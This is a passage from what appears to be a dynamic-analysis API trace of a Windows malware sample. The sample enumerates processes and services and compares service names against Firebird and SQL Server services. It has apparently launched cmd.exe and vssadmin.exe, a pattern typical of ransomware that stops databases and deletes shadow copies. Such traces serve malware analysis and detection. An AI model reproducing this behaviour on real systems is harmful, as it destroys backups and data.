[0173.352] lstrlenW (lpString="RpcEptMapper") returned 12 [0173.352] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0173.352] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0173.352] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0173.352] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0173.352] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0173.352] lstrlenW (lpString="RpcSs") returned 5 [0173.352] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0173.353] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0173.353] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0173.353] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0173.353] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0173.353] lstrlenW (lpString="SamSs") returned 5 [0173.353] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0173.353] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0173.353] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0173.353] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0173.353] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0173.353] lstrlenW (lpString="Schedule") returned 8 [0173.353] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0173.353] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0173.353] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0173.353] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0173.353] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0173.353] lstrlenW (lpString="SecurityHealthService") returned 21 [0173.353] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0173.353] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0173.353] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0173.353] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0173.353] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0173.353] lstrlenW (lpString="SENS") returned 4 [0173.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0173.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0173.354] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0173.354] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0173.354] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0173.354] lstrlenW (lpString="ShellHWDetection") returned 16 [0173.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0173.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0173.354] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0173.354] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0173.354] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0173.354] lstrlenW (lpString="Spooler") returned 7 [0173.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0173.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0173.354] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0173.354] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0173.354] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0173.354] lstrlenW (lpString="StateRepository") returned 15 [0173.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0173.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0173.354] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0173.354] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0173.354] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0173.354] lstrlenW (lpString="SysMain") returned 7 [0173.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0173.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0173.355] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0173.355] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0173.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0173.355] lstrlenW (lpString="SystemEventsBroker") returned 18 [0173.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0173.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0173.355] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0173.355] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0173.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0173.355] lstrlenW (lpString="Themes") returned 6 [0173.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0173.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0173.355] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0173.355] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0173.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0173.355] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0173.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0173.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0173.355] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0173.355] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0173.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a4f50 | out: hHeap=0x6a0000) returned 1 [0173.356] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x37c [0173.359] Process32FirstW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.360] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0173.361] lstrlenW (lpString="System") returned 6 [0173.361] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0173.362] lstrlenW (lpString="smss.exe") returned 8 [0173.362] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.362] lstrlenW (lpString="csrss.exe") returned 9 [0173.363] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0173.363] lstrlenW (lpString="wininit.exe") returned 11 [0173.363] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.364] lstrlenW (lpString="csrss.exe") returned 9 [0173.364] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0173.367] lstrlenW (lpString="winlogon.exe") returned 12 [0173.367] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0173.368] lstrlenW (lpString="services.exe") returned 12 [0173.368] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0173.369] lstrlenW (lpString="lsass.exe") returned 9 [0173.369] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0173.371] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0173.371] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0173.372] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0173.372] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.373] lstrlenW (lpString="svchost.exe") returned 11 [0173.373] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.374] lstrlenW (lpString="svchost.exe") returned 11 [0173.374] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0173.375] lstrlenW (lpString="dwm.exe") returned 7 [0173.375] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.376] lstrlenW (lpString="svchost.exe") returned 11 [0173.376] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.377] lstrlenW (lpString="svchost.exe") returned 11 [0173.377] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.378] lstrlenW (lpString="svchost.exe") returned 11 [0173.378] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.380] lstrlenW (lpString="svchost.exe") returned 11 [0173.380] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.381] lstrlenW (lpString="svchost.exe") returned 11 [0173.381] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.382] lstrlenW (lpString="svchost.exe") returned 11 [0173.382] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.383] lstrlenW (lpString="svchost.exe") returned 11 [0173.383] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.384] lstrlenW (lpString="svchost.exe") returned 11 [0173.384] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.401] lstrlenW (lpString="svchost.exe") returned 11 [0173.401] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.402] lstrlenW (lpString="svchost.exe") returned 11 [0173.432] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0173.432] lstrlenW (lpString="spoolsv.exe") returned 11 [0173.433] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.434] lstrlenW (lpString="svchost.exe") returned 11 [0173.434] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0173.434] lstrlenW (lpString="audiodg.exe") returned 11 [0173.435] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0173.435] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0173.435] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0173.436] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0173.436] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0173.437] lstrlenW (lpString="Memory Compression") returned 18 [0173.437] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0173.438] lstrlenW (lpString="sihost.exe") returned 10 [0173.438] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.439] lstrlenW (lpString="svchost.exe") returned 11 [0173.439] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0173.440] lstrlenW (lpString="msoia.exe") returned 9 [0173.441] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0173.442] lstrlenW (lpString="taskhostw.exe") returned 13 [0173.442] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.443] lstrlenW (lpString="explorer.exe") returned 12 [0173.443] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0173.443] lstrlenW (lpString="SearchUI.exe") returned 12 [0173.444] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0173.444] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0173.444] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0173.445] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0173.445] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.446] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0173.446] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0173.447] lstrlenW (lpString="hgaibc.exe") returned 10 [0173.447] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0173.448] lstrlenW (lpString="cmd.exe") returned 7 [0173.448] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0173.449] lstrlenW (lpString="conhost.exe") returned 11 [0173.449] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3bc, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0173.450] lstrlenW (lpString="consent.exe") returned 11 [0173.450] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0173.451] lstrlenW (lpString="dllhost.exe") returned 11 [0173.451] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0173.452] lstrlenW (lpString="vssadmin.exe") returned 12 [0173.452] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0173.453] CloseHandle (hObject=0x37c) returned 1 [0173.453] Sleep (dwMilliseconds=0x1f4) [0174.195] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c240 [0174.325] EnumServicesStatusExW (in: hSCManager=0x458c240, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0174.326] GetLastError () returned 0xea [0174.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x45ff6f8 [0174.326] EnumServicesStatusExW (in: hSCManager=0x458c240, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x45ff6f8, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x45ff6f8, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0174.328] CloseServiceHandle (hSCObject=0x458c240) returned 1 [0174.331] lstrlenW (lpString="Appinfo") returned 7 [0174.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0174.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0174.332] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0174.332] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0174.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0174.332] lstrlenW (lpString="AppXSvc") returned 7 [0174.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0174.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0174.332] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0174.332] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0174.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0174.332] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0174.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0174.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0174.332] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0174.332] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0174.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0174.332] lstrlenW (lpString="Audiosrv") returned 8 [0174.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0174.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0174.332] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0174.332] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0174.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0174.332] lstrlenW (lpString="BFE") returned 3 [0174.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 